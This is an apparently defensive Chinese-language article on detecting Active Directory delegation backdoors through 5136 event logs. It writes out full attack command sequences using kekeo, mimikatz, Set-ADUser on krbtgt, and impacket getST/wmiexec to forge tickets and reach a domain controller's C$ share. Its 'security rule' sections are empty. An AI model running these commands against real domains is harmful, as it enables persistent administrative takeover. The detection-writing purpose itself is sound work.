基于AD Event日志監測域委派后門

01、簡介

域委派是指將域內用戶的權限委派給服務賬號，使得服務賬號能以用戶權限開展域內活動。攻擊者在獲取到域控權限后，可以利用約束委派或者基于資源的約束委派實現后門，以實現達到維持權限的目的。

基于AD Event日志監視對特定 Active Directory 屬性的修改，從而發現可疑的域委派后門。

02、約束委派攻擊場景

假設服務賬號配置了到域控的約束性委派，當攻擊者控制了服務賬號，就可以偽造任意用戶的TGT，來打造一個變種的黃金票據。

（1）設置約束委派

setspn -U -A cifs/test  test

（2）構造服務賬戶test的票據

kekeo.exe "tgt::ask /user:test /domain:evil.com /password:abc123! /ticket:test.kirbi" "exit"

（3）利用偽造的票據，向域服務器申請CIFS服務票據。

kekeo.exe "tgs::s4u /tgt:TGT_test@EVIL.COM_krbtgt~evil.com@EVIL.COM.kirbi /user:administrator@evil.com /service:cifs/WIN-DC01" "exit"

（4）使用mimikatz將該票據注入當前的會話中。

mimikatz.exe "kerberos::ptt TGS_administrator@evil.com@EVIL.COM_test@EVIL.COM.kirbi" "exit"

（5）訪問目標共享盤。

dir \\win-dc01\c$

檢測方法：攻擊手法的核心點在于攻擊者需要修改msDS-AllowedToDelegateTo屬性，因此我們只需要檢測對msDS-AllowedToDelegateTo屬性的修改，可以通過5136日志來監控。

安全規則：

03、基于資源的約束委派攻擊場景

攻擊者在獲取到域控權限后，可以利用基于資源的約束委派實現后門，通過對krbtgt用戶設置委派屬性，以實現達到維持權限的目的。

（1）設置屬性值并查詢

Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount testGet-ADUser krbtgt -Properties PrincipalsAllowedToDelegateToAccount

（2）獲取ST，并使用wmiexec登錄域控。

python getST.py -dc-ip 192.168.44.136 -spn krbtgt -impersonate administrator evil.com/test:abc123!set KRB5CCNAME=administrator.ccachepython wmiexec.py -no-pass -k administrator@win-dc01 -dc-ip 192.168.44.136

檢測方法：攻擊手法的核心點在于攻擊者需要修改msDS-AllowedToActOnBehalfOfOtherIdentity屬性，因此我們只需要檢測對msDS-AllowedToActOnBehalfOfOtherIdentity屬性的修改，可以通過5136日志來監控。

安全規則：